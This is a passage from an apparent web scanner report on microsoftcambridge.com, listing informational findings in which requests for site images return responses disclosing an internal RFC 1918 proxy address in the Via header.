Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/michiganross_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/michiganross_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 24 Mar 2011 22:12:38 GMT
Content-Length: 3298
Date: Sat, 26 Mar 2011 01:42:38 GMT
X-Varnish: 1939100023
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.33. http://microsoftcambridge.com/Portals/0/events/owasp_boston_application_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/owasp_boston_application_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/owasp_boston_application_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 13 Oct 2010 20:19:10 GMT
Content-Length: 3728
Date: Sat, 26 Mar 2011 01:42:38 GMT
X-Varnish: 1939100049
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...2IDATx..Yy.........c}o.p.W...$.MZHB8.$..Q
..HUK[.P)..J....h.ZU=...j....G.g.4!*..f....fm..^.....g.3..&.z.G....h.x....;...{K...j>
...[SNIP]...
24.34. http://microsoftcambridge.com/Portals/0/events/pythonmeetup_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/pythonmeetup_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/pythonmeetup_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 17 May 2010 21:12:58 GMT
Content-Length: 1675
Date: Sat, 26 Mar 2011 01:42:35 GMT
X-Varnish: 1939099286
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...-IDATx..YKLTW...cf..5.3..(..H....b..Z-..b.&.h].j.....W....i76&Z..&uC..iJ.!1....XIQKxI..y...w.>....e.A.Zm ..\..9......r`.n...%.
...[SNIP]...
24.35. http://microsoftcambridge.com/Portals/0/events/refreshBoston_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/refreshBoston_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/refreshBoston_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 10 Feb 2011 19:17:36 GMT
Content-Length: 2147
Date: Sat, 26 Mar 2011 01:42:37 GMT
X-Varnish: 1939099718
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx...{l[w.....|..u.8v.$N.6.5)m. .5+..-].CL..(.C..b.....+....T.R).46.hL...UU...vM..,Y..y.&..4N..._...8.N..M....L.l.Z........
...[SNIP]...
24.36. http://microsoftcambridge.com/Portals/0/events/register_now.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/register_now.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/register_now.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Thu, 12 Feb 2009 04:30:09 GMT
Content-Length: 7144
Date: Sat, 26 Mar 2011 01:42:31 GMT
X-Varnish: 1939097628
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<....
.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.27
...[SNIP]...
24.37. http://microsoftcambridge.com/Portals/0/events/rootcauseshowcase_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/rootcauseshowcase_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/rootcauseshowcase_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 24 Mar 2011 23:08:31 GMT
Content-Length: 2672
Date: Sat, 26 Mar 2011 01:42:38 GMT
X-Varnish: 1939100047
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.38. http://microsoftcambridge.com/Portals/0/events/scala_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/scala_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/scala_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 25 Mar 2011 13:49:42 GMT
Content-Length: 3533
Date: Sat, 26 Mar 2011 01:42:35 GMT
X-Varnish: 1939099276
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...kiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.39. http://microsoftcambridge.com/Portals/0/events/tick.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/tick.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/tick.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 04:30:12 GMT
Content-Length: 2934
Date: Sat, 26 Mar 2011 01:42:39 GMT
X-Varnish: 1939100452
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......    ......Sm.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.40. http://microsoftcambridge.com/Portals/0/events/upcomingevents.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/upcomingevents.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/upcomingevents.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 01 Jul 2009 16:09:49 GMT
Content-Length: 6284
Date: Sat, 26 Mar 2011 01:42:31 GMT
X-Varnish: 1939097635
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...,...%........    ....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.41. http://microsoftcambridge.com/Portals/0/events/viewarch.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/viewarch.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/viewarch.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 25 Jun 2009 15:09:29 GMT
Content-Length: 4428
Date: Sat, 26 Mar 2011 01:42:32 GMT
X-Varnish: 1939098005
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...,...........r.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.42. http://microsoftcambridge.com/Portals/0/events/viewupc.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/viewupc.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/viewupc.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 25 Jun 2009 15:09:29 GMT
Content-Length: 4724
Date: Sat, 26 Mar 2011 01:42:32 GMT
X-Varnish: 1939098007
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...,...........r.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.43. http://microsoftcambridge.com/Portals/0/events/webspark_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/webspark_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/webspark_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Wed, 28 Jul 2010 19:05:09 GMT
Content-Length: 4019
Date: Sat, 26 Mar 2011 01:42:33 GMT
X-Varnish: 1939098489
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...UIDATx..Y    tTU...{....*K%!        {.H..b..4."J.....7\..Y..f..."....A.PV.e..,"..$@...BV....R.[..W..h.....x...z.{_.{..~............o.1..
...[SNIP]...
24.44. http://microsoftcambridge.com/Portals/0/events/wid_thum.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/events/wid_thum.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/events/wid_thum.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 07 Jan 2011 19:38:28 GMT
Content-Length: 1997
Date: Sat, 26 Mar 2011 01:42:33 GMT
X-Varnish: 1939098483
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...F...(.............tEXtSoftware.Adobe ImageReadyq.e<...oIDATx..Y[l.W..sf....;7.MB.....(.E. ..R..
.R@..^...[%.J.vQ.>..O..BBl..H.DZ..d....&(...4../..v....q.&..F.8....s....|...Ic.F....

...[SNIP]...
24.45. http://microsoftcambridge.com/Portals/0/home/EdwinGuarinSm.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/home/EdwinGuarinSm.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/home/EdwinGuarinSm.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 20:28:02 GMT
Content-Length: 19184
Date: Sat, 26 Mar 2011 01:40:28 GMT
X-Varnish: 1939059706
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   ..................................................................................................
...[SNIP]...
24.46. http://microsoftcambridge.com/Portals/0/home/chronicle-vid.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/home/chronicle-vid.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/home/chronicle-vid.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Wed, 03 Nov 2010 21:25:04 GMT
Content-Length: 21884
Date: Sat, 26 Mar 2011 01:40:27 GMT
X-Varnish: 1939059426
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................W..
...[SNIP]...
24.47. http://microsoftcambridge.com/Portals/0/home/inthenews.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/home/inthenews.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/home/inthenews.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 20:27:02 GMT
Content-Length: 4444
Date: Sat, 26 Mar 2011 01:40:26 GMT
X-Varnish: 1939059250
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...%......]......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.48. http://microsoftcambridge.com/Portals/0/home/studentstab.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/home/studentstab.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/home/studentstab.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 20:26:45 GMT
Content-Length: 4075
Date: Sat, 26 Mar 2011 01:40:28 GMT
X-Varnish: 1939059716
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...,...%........    ....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.49. http://microsoftcambridge.com/Portals/0/home/upcomingevents.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/home/upcomingevents.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /Portals/0/home/upcomingevents.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Tue, 16 Jun 2009 19:33:41 GMT
Content-Length: 4848
Date: Sat, 26 Mar 2011 01:40:25 GMT
X-Varnish: 1939058950
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
